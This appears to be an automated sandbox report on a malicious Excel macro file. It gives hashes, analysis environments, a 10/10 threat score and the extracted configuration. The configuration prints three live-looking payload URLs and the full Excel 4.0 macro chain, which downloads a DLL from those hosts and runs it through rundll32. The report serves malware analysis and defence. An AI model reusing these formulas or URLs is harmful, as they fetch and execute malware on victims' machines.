General
-
Target
?i=1awpumfgz
-
Size
83KB
-
Sample
220522-f566dsbbgr
-
MD5
c70893d52dce1a97f5cabbcd042d286c
-
SHA1
521a0ff74064ea610ca112d166319f55d792b667
-
SHA256
37bb74fcd5b1ff6bbd323163e21277b3ed80d124cc4d727f4ec64d1048a2c85e
-
SHA512
507a95d0f831f221e44f9a0c162490fa836cd21d5ee11522b661c198a4c4a295b74960bd3cf43bfda7815e6eee88111b7be5a0a63a1bf14339648a540571e203
Behavioral task
behavioral1
Sample
?i=1awpumfgz.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1awpumfgz.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
https://digitalcardsbychivami.xyz/includes/KrPj/
http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/
http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://digitalcardsbychivami.xyz/includes/KrPj/","..\dwa.ocx",0,0) =IF('RHEEHGF'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\dwa.ocx,D""&""l""&""lR""&""egister""&""Server") =RETURN()
Extracted
https://digitalcardsbychivami.xyz/includes/KrPj/
http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/
http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/
Targets
-
-
Target
?i=1awpumfgz
-
Size
83KB
-
MD5
c70893d52dce1a97f5cabbcd042d286c
-
SHA1
521a0ff74064ea610ca112d166319f55d792b667
-
SHA256
37bb74fcd5b1ff6bbd323163e21277b3ed80d124cc4d727f4ec64d1048a2c85e
-
SHA512
507a95d0f831f221e44f9a0c162490fa836cd21d5ee11522b661c198a4c4a295b74960bd3cf43bfda7815e6eee88111b7be5a0a63a1bf14339648a540571e203
Score10/10 -